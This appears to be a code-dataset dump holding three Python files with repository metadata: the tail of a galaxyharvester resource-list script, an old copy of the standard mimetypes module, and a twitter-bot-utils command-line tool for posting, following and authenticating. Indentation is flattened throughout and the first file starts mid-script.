cursor.execute('SELECT tResourceGroup.resourceGroup, groupName, CONCAT("p", CASE WHEN Max(CRmax)>0 THEN "1" ELSE "0" END, CASE WHEN Max(CDmax)>0 THEN "1" ELSE "0" END, CASE WHEN Max(DRmax)>0 THEN "1" ELSE "0" END, CASE WHEN Max(FLmax)>0 THEN "1" ELSE "0" END, CASE WHEN Max(HRmax)>0 THEN "1" ELSE "0" END, CASE WHEN Max(MAmax)>0 THEN "1" ELSE "0" END, CASE WHEN Max(PEmax)>0 THEN "1" ELSE "0" END, CASE WHEN Max(OQmax)>0 THEN "1" ELSE "0" END, CASE WHEN Max(SRmax)>0 THEN "1" ELSE "0" END, CASE WHEN Max(UTmax)>0 THEN "1" ELSE "0" END, CASE WHEN Max(ERmax)>0 THEN "1" ELSE "0" END) AS statMask, tResourceGroup.containerType FROM tResourceGroup' + joinStr + ' LEFT JOIN tResourceTypeGroup ON tResourceGroup.resourceGroup = tResourceTypeGroup.resourceGroup LEFT JOIN tResourceType ON tResourceTypeGroup.resourceType = tResourceType.resourceType WHERE enterable>0 GROUP BY tResourceGroup.resourceGroup ORDER BY groupName;')
row = cursor.fetchone()
while (row != None):
if outType == 'links':
print('<li><a href="/resourceType.py/' + row[0] + '">' + row[1] + '</a></li>')
elif outType == 'graphic':
print("<div id='resInventory{0}' class='inventoryItem inlineBlock' style='background-image:url(/images/resources/{2}.png);background-size:64px 64px;' tag='{1}'>".format(row[0], row[2], row[3]))
print("<div style='position: absolute;bottom:0;width:100%'>{0}</div>".format(row[1]))
print("</div>")
else:
print('<option value="'+str(row[0])+'" title="'+row[2]+'">'+row[1]+'</option>')
row = cursor.fetchone()
if outType == 'links':
print('</ul>')
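# --- Hardening note (not part of the original script) ---
# The queries above interpolate the (escaped) category into the SQL text.
# With pymysql the same filter can be expressed with a bound parameter,
# avoiding string assembly entirely, e.g.:
#
#   cursor.execute('SELECT resourceGroup FROM tResourceGroupCategory'
#                  ' WHERE resourceCategory = %s', (resCategory,))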
|
pwillworth/galaxyharvester
|
html/getResourceGroupList.py
|
Python
|
gpl-3.0
| 3,121
|
[
"Galaxy"
] |
ebcccff6b47a27935b8f9a43edd0f21869effc7dc4c79024d2dd429d6f38629a
|
"""Guess the MIME type of a file.
This module defines two useful functions:
guess_type(url, strict=True) -- guess the MIME type and encoding of a URL.
guess_extension(type, strict=True) -- guess the extension for a given MIME type.
It also contains the following, for tuning the behavior:
Data:
knownfiles -- list of files to parse
inited -- flag set when init() has been called
suffix_map -- dictionary mapping suffixes to suffixes
encodings_map -- dictionary mapping suffixes to encodings
types_map -- dictionary mapping suffixes to types
Functions:
init([files]) -- parse a list of files, default knownfiles (on Windows, the
default values are taken from the registry)
read_mime_types(file) -- parse one file, return a dictionary or None
"""
import os
import sys
import posixpath
import urllib.parse
try:
import winreg as _winreg
except ImportError:
_winreg = None
__all__ = [
"guess_type","guess_extension","guess_all_extensions",
"add_type","read_mime_types","init"
]
knownfiles = [
"/etc/mime.types",
"/etc/httpd/mime.types", # Mac OS X
"/etc/httpd/conf/mime.types", # Apache
"/etc/apache/mime.types", # Apache 1
"/etc/apache2/mime.types", # Apache 2
"/usr/local/etc/httpd/conf/mime.types",
"/usr/local/lib/netscape/mime.types",
"/usr/local/etc/httpd/conf/mime.types", # Apache 1.2
"/usr/local/etc/mime.types", # Apache 1.3
]
inited = False
_db = None
class MimeTypes:
"""MIME-types datastore.
This datastore can handle information from mime.types-style files
and supports basic determination of MIME type from a filename or
URL, and can guess a reasonable extension given a MIME type.
"""
def __init__(self, filenames=(), strict=True):
if not inited:
init()
self.encodings_map = encodings_map.copy()
self.suffix_map = suffix_map.copy()
self.types_map = ({}, {}) # dict for (non-strict, strict)
self.types_map_inv = ({}, {})
for (ext, type) in types_map.items():
self.add_type(type, ext, True)
for (ext, type) in common_types.items():
self.add_type(type, ext, False)
for name in filenames:
self.read(name, strict)
def add_type(self, type, ext, strict=True):
"""Add a mapping between a type and an extension.
When the extension is already known, the new
type will replace the old one. When the type
is already known the extension will be added
to the list of known extensions.
If strict is true, information will be added to
list of standard types, else to the list of non-standard
types.
"""
self.types_map[strict][ext] = type
exts = self.types_map_inv[strict].setdefault(type, [])
if ext not in exts:
exts.append(ext)
def guess_type(self, url, strict=True):
"""Guess the type of a file based on its URL.
Return value is a tuple (type, encoding) where type is None if
the type can't be guessed (no or unknown suffix) or a string
of the form type/subtype, usable for a MIME Content-type
header; and encoding is None for no encoding or the name of
the program used to encode (e.g. compress or gzip). The
mappings are table driven. Encoding suffixes are case
sensitive; type suffixes are first tried case sensitive, then
case insensitive.
The suffixes .tgz, .taz and .tz (case sensitive!) are all
mapped to '.tar.gz'. (This is table-driven too, using the
dictionary suffix_map.)
Optional `strict' argument when False adds a bunch of commonly found,
but non-standard types.
"""
scheme, url = urllib.parse.splittype(url)
if scheme == 'data':
# syntax of data URLs:
# dataurl := "data:" [ mediatype ] [ ";base64" ] "," data
# mediatype := [ type "/" subtype ] *( ";" parameter )
# data := *urlchar
# parameter := attribute "=" value
# type/subtype defaults to "text/plain"
comma = url.find(',')
if comma < 0:
# bad data URL
return None, None
semi = url.find(';', 0, comma)
if semi >= 0:
type = url[:semi]
else:
type = url[:comma]
if '=' in type or '/' not in type:
type = 'text/plain'
return type, None # never compressed, so encoding is None
base, ext = posixpath.splitext(url)
while ext in self.suffix_map:
base, ext = posixpath.splitext(base + self.suffix_map[ext])
if ext in self.encodings_map:
encoding = self.encodings_map[ext]
base, ext = posixpath.splitext(base)
else:
encoding = None
types_map = self.types_map[True]
if ext in types_map:
return types_map[ext], encoding
elif ext.lower() in types_map:
return types_map[ext.lower()], encoding
elif strict:
return None, encoding
types_map = self.types_map[False]
if ext in types_map:
return types_map[ext], encoding
elif ext.lower() in types_map:
return types_map[ext.lower()], encoding
else:
return None, encoding
def guess_all_extensions(self, type, strict=True):
"""Guess the extensions for a file based on its MIME type.
Return value is a list of strings giving the possible filename
extensions, including the leading dot ('.'). The extension is not
guaranteed to have been associated with any particular data stream,
but would be mapped to the MIME type `type' by guess_type().
Optional `strict' argument when false adds a bunch of commonly found,
but non-standard types.
"""
type = type.lower()
extensions = self.types_map_inv[True].get(type, [])
if not strict:
for ext in self.types_map_inv[False].get(type, []):
if ext not in extensions:
extensions.append(ext)
return extensions
def guess_extension(self, type, strict=True):
"""Guess the extension for a file based on its MIME type.
Return value is a string giving a filename extension,
including the leading dot ('.'). The extension is not
guaranteed to have been associated with any particular data
stream, but would be mapped to the MIME type `type' by
guess_type(). If no extension can be guessed for `type', None
is returned.
Optional `strict' argument when false adds a bunch of commonly found,
but non-standard types.
"""
extensions = self.guess_all_extensions(type, strict)
if not extensions:
return None
return extensions[0]
def read(self, filename, strict=True):
"""
Read a single mime.types-format file, specified by pathname.
If strict is true, information will be added to
list of standard types, else to the list of non-standard
types.
"""
with open(filename) as fp:
self.readfp(fp, strict)
def readfp(self, fp, strict=True):
"""
Read a single mime.types-format file.
If strict is true, information will be added to
list of standard types, else to the list of non-standard
types.
"""
while 1:
line = fp.readline()
if not line:
break
words = line.split()
for i in range(len(words)):
if words[i][0] == '#':
del words[i:]
break
if not words:
continue
type, suffixes = words[0], words[1:]
for suff in suffixes:
self.add_type(type, '.' + suff, strict)
def read_windows_registry(self, strict=True):
"""
Load the MIME types database from Windows registry.
If strict is true, information will be added to
list of standard types, else to the list of non-standard
types.
"""
# Windows only
if not _winreg:
return
def enum_types(mimedb):
i = 0
while True:
try:
ctype = _winreg.EnumKey(mimedb, i)
except EnvironmentError:
break
else:
yield ctype
i += 1
default_encoding = sys.getdefaultencoding()
with _winreg.OpenKey(_winreg.HKEY_CLASSES_ROOT,
r'MIME\Database\Content Type') as mimedb:
for ctype in enum_types(mimedb):
try:
with _winreg.OpenKey(mimedb, ctype) as key:
suffix, datatype = _winreg.QueryValueEx(key,
'Extension')
except EnvironmentError:
continue
if datatype != _winreg.REG_SZ:
continue
self.add_type(ctype, suffix, strict)
def guess_type(url, strict=True):
"""Guess the type of a file based on its URL.
Return value is a tuple (type, encoding) where type is None if the
type can't be guessed (no or unknown suffix) or a string of the
form type/subtype, usable for a MIME Content-type header; and
encoding is None for no encoding or the name of the program used
to encode (e.g. compress or gzip). The mappings are table
driven. Encoding suffixes are case sensitive; type suffixes are
first tried case sensitive, then case insensitive.
The suffixes .tgz, .taz and .tz (case sensitive!) are all mapped
to ".tar.gz". (This is table-driven too, using the dictionary
suffix_map).
Optional `strict' argument when false adds a bunch of commonly found, but
non-standard types.
"""
if _db is None:
init()
return _db.guess_type(url, strict)
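# Example (illustrative; exact results depend on the local type database):
#   >>> guess_type('archive.tar.gz')
#   ('application/x-tar', 'gzip')
#   >>> guess_type('data:text/plain;base64,SGVsbG8=')
#   ('text/plain', None)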
def guess_all_extensions(type, strict=True):
"""Guess the extensions for a file based on its MIME type.
Return value is a list of strings giving the possible filename
extensions, including the leading dot ('.'). The extension is not
guaranteed to have been associated with any particular data
stream, but would be mapped to the MIME type `type' by
guess_type(). If no extension can be guessed for `type', None
is returned.
Optional `strict' argument when false adds a bunch of commonly found,
but non-standard types.
"""
if _db is None:
init()
return _db.guess_all_extensions(type, strict)
def guess_extension(type, strict=True):
"""Guess the extension for a file based on its MIME type.
Return value is a string giving a filename extension, including the
leading dot ('.'). The extension is not guaranteed to have been
associated with any particular data stream, but would be mapped to the
MIME type `type' by guess_type(). If no extension can be guessed for
`type', None is returned.
Optional `strict' argument when false adds a bunch of commonly found,
but non-standard types.
"""
if _db is None:
init()
return _db.guess_extension(type, strict)
def add_type(type, ext, strict=True):
"""Add a mapping between a type and an extension.
When the extension is already known, the new
type will replace the old one. When the type
is already known the extension will be added
to the list of known extensions.
If strict is true, information will be added to
list of standard types, else to the list of non-standard
types.
"""
if _db is None:
init()
return _db.add_type(type, ext, strict)
def init(files=None):
global suffix_map, types_map, encodings_map, common_types
global inited, _db
inited = True # so that MimeTypes.__init__() doesn't call us again
db = MimeTypes()
if files is None:
if _winreg:
db.read_windows_registry()
files = knownfiles
for file in files:
if os.path.isfile(file):
db.read(file)
encodings_map = db.encodings_map
suffix_map = db.suffix_map
types_map = db.types_map[True]
common_types = db.types_map[False]
# Make the DB a global variable now that it is fully initialized
_db = db
def read_mime_types(file):
try:
f = open(file)
except IOError:
return None
db = MimeTypes()
db.readfp(f, True)
return db.types_map[True]
def _default_mime_types():
global suffix_map
global encodings_map
global types_map
global common_types
suffix_map = {
'.svgz': '.svg.gz',
'.tgz': '.tar.gz',
'.taz': '.tar.gz',
'.tz': '.tar.gz',
'.tbz2': '.tar.bz2',
}
encodings_map = {
'.gz': 'gzip',
'.Z': 'compress',
'.bz2': 'bzip2',
}
# Before adding new types, make sure they are either registered with IANA,
# at http://www.iana.org/assignments/media-types
# or extensions, i.e. using the x- prefix
# If you add to these, please keep them sorted!
types_map = {
'.a' : 'application/octet-stream',
'.ai' : 'application/postscript',
'.aif' : 'audio/x-aiff',
'.aifc' : 'audio/x-aiff',
'.aiff' : 'audio/x-aiff',
'.au' : 'audio/basic',
'.avi' : 'video/x-msvideo',
'.bat' : 'text/plain',
'.bcpio' : 'application/x-bcpio',
'.bin' : 'application/octet-stream',
'.bmp' : 'image/x-ms-bmp',
'.c' : 'text/plain',
# Duplicates :(
'.cdf' : 'application/x-cdf',
'.cdf' : 'application/x-netcdf',
'.cpio' : 'application/x-cpio',
'.csh' : 'application/x-csh',
'.css' : 'text/css',
'.dll' : 'application/octet-stream',
'.doc' : 'application/msword',
'.dot' : 'application/msword',
'.dvi' : 'application/x-dvi',
'.eml' : 'message/rfc822',
'.eps' : 'application/postscript',
'.etx' : 'text/x-setext',
'.exe' : 'application/octet-stream',
'.gif' : 'image/gif',
'.gtar' : 'application/x-gtar',
'.h' : 'text/plain',
'.hdf' : 'application/x-hdf',
'.htm' : 'text/html',
'.html' : 'text/html',
'.ief' : 'image/ief',
'.jpe' : 'image/jpeg',
'.jpeg' : 'image/jpeg',
'.jpg' : 'image/jpeg',
'.js' : 'application/x-javascript',
'.ksh' : 'text/plain',
'.latex' : 'application/x-latex',
'.m1v' : 'video/mpeg',
'.man' : 'application/x-troff-man',
'.me' : 'application/x-troff-me',
'.mht' : 'message/rfc822',
'.mhtml' : 'message/rfc822',
'.mif' : 'application/x-mif',
'.mov' : 'video/quicktime',
'.movie' : 'video/x-sgi-movie',
'.mp2' : 'audio/mpeg',
'.mp3' : 'audio/mpeg',
'.mp4' : 'video/mp4',
'.mpa' : 'video/mpeg',
'.mpe' : 'video/mpeg',
'.mpeg' : 'video/mpeg',
'.mpg' : 'video/mpeg',
'.ms' : 'application/x-troff-ms',
'.nc' : 'application/x-netcdf',
'.nws' : 'message/rfc822',
'.o' : 'application/octet-stream',
'.obj' : 'application/octet-stream',
'.oda' : 'application/oda',
'.p12' : 'application/x-pkcs12',
'.p7c' : 'application/pkcs7-mime',
'.pbm' : 'image/x-portable-bitmap',
'.pdf' : 'application/pdf',
'.pfx' : 'application/x-pkcs12',
'.pgm' : 'image/x-portable-graymap',
'.pl' : 'text/plain',
'.png' : 'image/png',
'.pnm' : 'image/x-portable-anymap',
'.pot' : 'application/vnd.ms-powerpoint',
'.ppa' : 'application/vnd.ms-powerpoint',
'.ppm' : 'image/x-portable-pixmap',
'.pps' : 'application/vnd.ms-powerpoint',
'.ppt' : 'application/vnd.ms-powerpoint',
'.ps' : 'application/postscript',
'.pwz' : 'application/vnd.ms-powerpoint',
'.py' : 'text/x-python',
'.pyc' : 'application/x-python-code',
'.pyo' : 'application/x-python-code',
'.qt' : 'video/quicktime',
'.ra' : 'audio/x-pn-realaudio',
'.ram' : 'application/x-pn-realaudio',
'.ras' : 'image/x-cmu-raster',
'.rdf' : 'application/xml',
'.rgb' : 'image/x-rgb',
'.roff' : 'application/x-troff',
'.rtx' : 'text/richtext',
'.sgm' : 'text/x-sgml',
'.sgml' : 'text/x-sgml',
'.sh' : 'application/x-sh',
'.shar' : 'application/x-shar',
'.snd' : 'audio/basic',
'.so' : 'application/octet-stream',
'.src' : 'application/x-wais-source',
'.sv4cpio': 'application/x-sv4cpio',
'.sv4crc' : 'application/x-sv4crc',
'.svg' : 'image/svg+xml',
'.swf' : 'application/x-shockwave-flash',
'.t' : 'application/x-troff',
'.tar' : 'application/x-tar',
'.tcl' : 'application/x-tcl',
'.tex' : 'application/x-tex',
'.texi' : 'application/x-texinfo',
'.texinfo': 'application/x-texinfo',
'.tif' : 'image/tiff',
'.tiff' : 'image/tiff',
'.tr' : 'application/x-troff',
'.tsv' : 'text/tab-separated-values',
'.txt' : 'text/plain',
'.ustar' : 'application/x-ustar',
'.vcf' : 'text/x-vcard',
'.wav' : 'audio/x-wav',
'.wiz' : 'application/msword',
'.wsdl' : 'application/xml',
'.xbm' : 'image/x-xbitmap',
'.xlb' : 'application/vnd.ms-excel',
# Duplicates :(
'.xls' : 'application/excel',
'.xls' : 'application/vnd.ms-excel',
'.xml' : 'text/xml',
'.xpdl' : 'application/xml',
'.xpm' : 'image/x-xpixmap',
'.xsl' : 'application/xml',
'.xwd' : 'image/x-xwindowdump',
'.zip' : 'application/zip',
}
# These are non-standard types, commonly found in the wild. They will
# only match if strict=0 flag is given to the API methods.
# Please sort these too
common_types = {
'.jpg' : 'image/jpg',
'.mid' : 'audio/midi',
'.midi': 'audio/midi',
'.pct' : 'image/pict',
'.pic' : 'image/pict',
'.pict': 'image/pict',
'.rtf' : 'application/rtf',
'.xul' : 'text/xul'
}
_default_mime_types()
if __name__ == '__main__':
import getopt
USAGE = """\
Usage: mimetypes.py [options] type
Options:
--help / -h -- print this message and exit
--lenient / -l -- additionally search of some common, but non-standard
types.
--extension / -e -- guess extension instead of type
More than one type argument may be given.
"""
def usage(code, msg=''):
print(USAGE)
if msg: print(msg)
sys.exit(code)
try:
opts, args = getopt.getopt(sys.argv[1:], 'hle',
['help', 'lenient', 'extension'])
except getopt.error as msg:
usage(1, msg)
strict = 1
extension = 0
for opt, arg in opts:
if opt in ('-h', '--help'):
usage(0)
elif opt in ('-l', '--lenient'):
strict = 0
elif opt in ('-e', '--extension'):
extension = 1
for gtype in args:
if extension:
guess = guess_extension(gtype, strict)
if not guess: print("I don't know anything about type", gtype)
else: print(guess)
else:
guess, encoding = guess_type(gtype, strict)
if not guess: print("I don't know anything about type", gtype)
else: print('type:', guess, 'encoding:', encoding)
|
edmundgentle/schoolscript
|
SchoolScript/bin/Debug/pythonlib/Lib/mimetypes.py
|
Python
|
gpl-2.0
| 20,950
|
[
"NetCDF"
] |
6143f6ff33c58e059fbee4a1cd03c43f9887551a011ffed109b8db61fa47babd
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2014-17 Neil Freeman contact@fakeisthenewreal.org
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""Command line interface for twitter-bot-utils"""
import logging
import sys
from argparse import ArgumentParser
import tweepy
from . import __version__ as version
from . import api, args, confighelper, tools
ARGS = ["config", "dry-run", "verbose", "quiet"]
AUTHORIZATION_FAILED_MESSAGE = "Authorization failed. Check that the consumer key and secret are correct."
DEPRECATION = "This command is deprecated. Please use the tbu command."
def fave_mentions(arguments=None):
"""Add a favorite to recent mentions."""
if arguments is None:
parser = ArgumentParser(description="fave/like mentions", usage="%(prog)s [options] screen_name")
parser.add_argument("screen_name", type=str)
args.add_default_args(parser, version=version, include=ARGS)
print(DEPRECATION, file=sys.stderr)
arguments = parser.parse_args()
twitter = api.API(arguments)
tools.fave_mentions(twitter, arguments.dry_run)
def auto_follow(arguments=None):
"""Follow-back recent followers."""
if arguments is None:
parser = ArgumentParser(
description="automatic following and unfollowing",
usage="%(prog)s [options] screen_name",
)
parser.add_argument("screen_name", type=str)
parser.add_argument("-U", "--unfollow", action="store_true", help="Unfollow those who don't follow you")
args.add_default_args(parser, version=version, include=ARGS)
arguments = parser.parse_args()
print(DEPRECATION, file=sys.stderr)
twitter = api.API(arguments)
if arguments.unfollow:
tools.unfollow(twitter, arguments.dry_run)
else:
tools.follow_back(twitter, arguments.dry_run)
def authenticate(arguments=None):
"""Authenticate with Twitter API"""
if arguments is None:
parser = ArgumentParser(description="Authorize an account with a twitter application.")
parser.add_argument("-c", metavar="file", type=str, default=None, dest="config_file", help="config file")
parser.add_argument("--app", metavar="app", type=str, help="app name in config file")
parser.add_argument("-s", "--save", action="store_true", help="Save details to config file")
parser.add_argument("--consumer-key", metavar="key", type=str, help="consumer key (aka consumer token)")
parser.add_argument("--consumer-secret", metavar="secret", type=str, help="consumer secret")
parser.add_argument("-V", "--version", action="version", version="%(prog)s " + version)
arguments = parser.parse_args()
print(DEPRECATION, file=sys.stderr)
# it's possible to pass keys and then save them to the files
if arguments.config_file:
file_name = confighelper.find_file(arguments.config_file)
config = confighelper.parse(file_name)
else:
file_name = None
config = {}
# Use passed credentials.
if arguments.consumer_key and arguments.consumer_secret:
consumer_key = arguments.consumer_key
consumer_secret = arguments.consumer_secret
# Go find credentials.
else:
try:
conf = config["apps"][arguments.app] if arguments.app else config
consumer_secret = conf["consumer_secret"]
consumer_key = conf["consumer_key"]
except KeyError as err:
msg = "Couldn't find consumer-key and consumer-secret for '{}' in {}".format(arguments.app, file_name)
raise KeyError(msg) from err
auth = tweepy.OAuthHandler(consumer_key, consumer_secret, "oob")
print(auth.get_authorization_url())
verifier = input('Please visit this url, click "Authorize app" and enter in the PIN:\n> ')
try:
auth.get_access_token(verifier)
except tweepy.error.TweepError:
print(AUTHORIZATION_FAILED_MESSAGE)
return
# True is the const passed when no file name is given
if arguments.save is not True:
file_name = arguments.save
# Save the keys back to the config file
if arguments.save and file_name:
apps = config["apps"] = config.get("apps", {})
users = config["users"] = config.get("users", {})
app = arguments.app or "default"
screen_name = auth.get_username().encode("utf-8")
apps[app] = apps.get(app, {})
apps[app].update(
{
"consumer_key": consumer_key,
"consumer_secret": consumer_secret,
}
)
users[screen_name] = users.get(screen_name, {})
users[screen_name].update(
{
"key": auth.access_token.encode("utf-8"),
"secret": auth.access_token_secret.encode("utf-8"),
"app": (arguments.app or "default"),
}
)
confighelper.dump(config, file_name)
print("Saved keys in {}".format(file_name))
# Or just print them
else:
print("key: {}\nsecret: {}".format(auth.access_token, auth.access_token_secret))
def post(arguments):
"""Post text to a given twitter account."""
twitter = api.API(arguments)
params = {}
if arguments.update == "-":
params["status"] = sys.stdin.read()
else:
params["status"] = arguments.update
if arguments.media_file:
medias = [twitter.media_upload(m) for m in arguments.media_file]
params["media_ids"] = [m.media_id for m in medias]
try:
logging.getLogger(arguments.screen_name).info("status: %s", params["status"])
if not arguments.dry_run:
twitter.update_status(**params)
    except tweepy.TweepError as err:
        logging.getLogger(arguments.screen_name).error(err)
def retweet(arguments):
"""Retweet a status"""
twitter = api.API(arguments)
twitter.retweet(id=arguments.id)
def main():
"""Command line interface for `tbu`."""
parser = ArgumentParser()
parser.add_argument("-V", "--version", action="version", version="%(prog)s " + version)
subparsers = parser.add_subparsers()
poster = subparsers.add_parser(
"post",
description="Post text to a given twitter account",
usage='%(prog)s screen_name "update" [options]',
)
poster.add_argument("screen_name", type=str)
poster.add_argument("update", type=str)
poster.add_argument("-m", "--media-file", type=str, action="append")
args.add_default_args(poster, include=["config", "dry-run", "verbose", "quiet"])
poster.set_defaults(func=post)
follow = subparsers.add_parser(
"follow",
description="automatic following and unfollowing",
usage="%(prog)s [options] screen_name",
)
follow.add_argument("screen_name", type=str)
follow.add_argument("-U", "--unfollow", action="store_true", help="Unfollow those who don't follow you")
follow.set_defaults(func=auto_follow)
auth = subparsers.add_parser(
"auth",
description="Authorize an account with a twitter application.",
usage="%(prog)s [options]",
)
auth.add_argument("-c", metavar="file", type=str, default=None, dest="config_file", help="config file")
auth.add_argument("--app", metavar="app", type=str, help="app name in config file")
auth.add_argument(
"-s",
"--save",
nargs="?",
const=True,
help="Save details to config file. If no file is given, uses file in --config.",
)
auth.add_argument("--consumer-key", metavar="key", type=str, help="consumer key (aka consumer token)")
auth.add_argument("--consumer-secret", metavar="secret", type=str, help="consumer secret")
auth.set_defaults(func=authenticate)
fave = subparsers.add_parser("like", description="fave/like mentions", usage="%(prog)s [options] screen_name")
fave.add_argument("screen_name", type=str)
    args.add_default_args(fave, include=ARGS)
    fave.set_defaults(func=fave_mentions)
arguments = parser.parse_args()
arguments.func(arguments)
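# --- Illustrative CLI usage (not part of the original module) ---
# Assuming the package's console entry point is installed as `tbu`, the
# subcommands defined above map to invocations such as (file names and
# screen names are placeholders):
#
#   tbu post my_bot "hello, world" -m photo.jpg --dry-run
#   tbu follow my_bot --unfollow
#   tbu auth --consumer-key KEY --consumer-secret SECRET -s
#   tbu like my_bot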
|
fitnr/twitter_bot_utils
|
src/twitter_bot_utils/cli.py
|
Python
|
gpl-3.0
| 8,641
|
[
"VisIt"
] |
1d39b425d8a04465dd9191ea59d872ebcb711d4c3b6cfd73f101fbbd85b83137
|